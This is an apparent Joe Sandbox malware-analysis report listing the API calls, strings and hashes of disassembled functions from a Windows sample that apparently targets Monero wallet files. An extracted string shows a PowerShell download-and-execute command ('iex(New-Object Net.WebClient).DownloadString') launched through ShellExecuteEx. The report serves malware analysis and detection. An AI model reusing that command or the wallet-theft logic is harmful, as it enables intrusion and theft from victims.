                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 6dbbe66e7ca0969682d750be9bf5dfb4ab2428b45414bc4639ddce4ca9af1aa2
                  • Instruction ID: bd593ed05cc1aa8816a72647f152b947350283c463923d0dfc00b221c2cdef48
                  • Opcode Fuzzy Hash: 6dbbe66e7ca0969682d750be9bf5dfb4ab2428b45414bc4639ddce4ca9af1aa2
                  • Instruction Fuzzy Hash: 863108B5A50218ABDB20CF54DC85BDCB7B4EB48704F5081E9F709A7281C7B06AC59F99
                  Function 002F83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 002F8426
                  • wsprintfA.USER32 ref: 002F8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 002F847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8499
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0132E948,00000000,000F003F,?,00000400), ref: 002F84EC
                  • lstrlen.KERNEL32(?), ref: 002F8501
                  • RegQueryValueExA.ADVAPI32(00000000,0132E9D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00300B34), ref: 002F8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: d4cae0af9ca8cd35b8f557a9bbcd716079f75fd92cc17eff268eda6d434104dc
                  • Instruction ID: c8406b0d39b9319ef063c336e0b1641df9db998c0f41831c375805bbed06c522
                  • Opcode Fuzzy Hash: d4cae0af9ca8cd35b8f557a9bbcd716079f75fd92cc17eff268eda6d434104dc
                  • Instruction Fuzzy Hash: 5421A7B191021C9BDB24DB54DC85FE9B7B8FB48700F0085A9A60996140DE716A86CF94
                  Function 002F7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0131BB98,00000000,00020119,00000000), ref: 002F76DD
                  • RegQueryValueExA.ADVAPI32(00000000,0132E9C0,00000000,00000000,?,000000FF), ref: 002F76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 002F7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 9f13abf6c65f32b1fc0326d7fdc194557a9f14768ad5d9401ae13c0b8e861510
                  • Instruction ID: c3a128b482988fe46eeccbd2135b1329d6e82b0b68738d97afc533e38ef94893
                  • Opcode Fuzzy Hash: 9f13abf6c65f32b1fc0326d7fdc194557a9f14768ad5d9401ae13c0b8e861510
                  • Instruction Fuzzy Hash: 56018BB5A10209BBEB10EBE0DC49FBAB7B8EF18701F104464FB04D7290E6B099099B51
                  Function 002F7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0131BB98,00000000,00020119,002F76B9), ref: 002F775B
                  • RegQueryValueExA.ADVAPI32(002F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 002F777A
                  • RegCloseKey.ADVAPI32(002F76B9), ref: 002F7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: d152f5e7eb36504460528d6caa95ac30c5af604521258c6fe9a9181cf560af4d
                  • Instruction ID: 9e3ce37fe4dd97d66013689003e941d1795fbe930928f58f774b5b9f89f39ee4
                  • Opcode Fuzzy Hash: d152f5e7eb36504460528d6caa95ac30c5af604521258c6fe9a9181cf560af4d
                  • Instruction Fuzzy Hash: 5C014FB5A40309BBEB10DBE0DC4AFBEB7B8EF58700F104558FA05A7281DA706A059B51
                  Function 002F92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(:/,80000000,00000003,00000000,00000003,00000080,00000000,?,002F3AEE,?), ref: 002F92FC
                  • GetFileSizeEx.KERNEL32(000000FF,:/), ref: 002F9319
                  • CloseHandle.KERNEL32(000000FF), ref: 002F9327
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID: :/$:/
                  • API String ID: 1378416451-70439090
                  • Opcode ID: bea7041351056f0d98ca129022a00108798521b270f91cb8290ea0843fd0c90b
                  • Instruction ID: 578e6c95e66c7f5eb83eeaa9e4f995ca766143a8480c329f4405c27713dbb8b1
                  • Opcode Fuzzy Hash: bea7041351056f0d98ca129022a00108798521b270f91cb8290ea0843fd0c90b
                  • Instruction Fuzzy Hash: 05F0AF34E10208BBDB20DFB4DC08FAEB7B9EB58350F10C2A4BA11A72C0E670A6419F40
                  Function 002E99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                  • LocalFree.KERNEL32(002E148F), ref: 002E9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: f9ac84b32661048a62fd9931ad6e57c3f5c9c8bbe26346536e90d5a65bcead32
                  • Instruction ID: 02e19689857a25931b2fe1c7feef3b3be67e4c7ffdb69b884a0c9b5eefa40c7b
                  • Opcode Fuzzy Hash: f9ac84b32661048a62fd9931ad6e57c3f5c9c8bbe26346536e90d5a65bcead32
                  • Instruction Fuzzy Hash: EB315CB4A1020AEFDB24CF95D885BAE77B4FF48340F108169E901A7390D774A995CFA1
                  Function 002F4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,0132ED20), ref: 002F47DB
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4801
                  • lstrcat.KERNEL32(?,?), ref: 002F4820
                  • lstrcat.KERNEL32(?,?), ref: 002F4834
                  • lstrcat.KERNEL32(?,0131B338), ref: 002F4847
                  • lstrcat.KERNEL32(?,?), ref: 002F485B
                  • lstrcat.KERNEL32(?,0132E4D8), ref: 002F486F
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002F8D90: GetFileAttributesA.KERNEL32(00000000,?,002E1B54,?,?,0030564C,?,?,00300E1F), ref: 002F8D9F
                    • Part of subcall function 002F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002F4580
                    • Part of subcall function 002F4570: RtlAllocateHeap.NTDLL(00000000), ref: 002F4587
                    • Part of subcall function 002F4570: wsprintfA.USER32 ref: 002F45A6
                    • Part of subcall function 002F4570: FindFirstFileA.KERNEL32(?,?), ref: 002F45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c539344408f285a276005811de6263ea926e8ec74062af9a2f647f094c1467b9
                  • Instruction ID: b13ea087e34c51ea523993ddb60625d017146602187c91062e933d20953c1f28
                  • Opcode Fuzzy Hash: c539344408f285a276005811de6263ea926e8ec74062af9a2f647f094c1467b9
                  • Instruction Fuzzy Hash: 493150B691020CA7CB21FBB0DC85EFDB378AF58740F404599B319A6081EEB4D69D8F95
                  Function 002F2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 002F2D85
                  Strings
                  • <, xrefs: 002F2D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 002F2CC4
                  • ')", xrefs: 002F2CB3
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 002F2D04
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: a95fb54c4aedabf7b94bbca1a016ac276775aa73833a9f9a0d31e2bb718f42b5
                  • Instruction ID: 1718cb4b21d40032f8cd35ddd3dd10ff19ff9aa022e322dd0dfa9ef9b055ae2a
                  • Opcode Fuzzy Hash: a95fb54c4aedabf7b94bbca1a016ac276775aa73833a9f9a0d31e2bb718f42b5
                  • Instruction Fuzzy Hash: 4141D0B1C2010C9ADB18FFA0C892BFDF774AF10780F504139E60AA6195DFB46A5ACF91
                  Function 002E9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 002E9F41
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 2f8864ae5c8331ccf4e6579f209f1e51b44cf5d3f3f9ae23cc965794ae1fa713
                  • Instruction ID: ca44c54d17fc168258f956ad8af5e312f7fdea43de0339411c5df19d38b02894
                  • Opcode Fuzzy Hash: 2f8864ae5c8331ccf4e6579f209f1e51b44cf5d3f3f9ae23cc965794ae1fa713
                  • Instruction Fuzzy Hash: A1615F70A6024CDBDB24EFA5CC96FEDB775AF40340F408128FA0A5B191EBB06A15CF52
                  Function 002F40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,0132E718,00000000,00020119,?), ref: 002F40F4
                  • RegQueryValueExA.ADVAPI32(?,0132ECD8,00000000,00000000,00000000,000000FF), ref: 002F4118
                  • RegCloseKey.ADVAPI32(?), ref: 002F4122
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4147
                  • lstrcat.KERNEL32(?,0132ED50), ref: 002F415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 3d793b349aecf1bf19d4a169e1ad34ff1c2f6d894bc2878bfe23fe8bf2888926
                  • Instruction ID: 8858099dbc45b305700818f02abb32e92e6a2bb7e8ff647e2b62a851db4f2527
                  • Opcode Fuzzy Hash: 3d793b349aecf1bf19d4a169e1ad34ff1c2f6d894bc2878bfe23fe8bf2888926
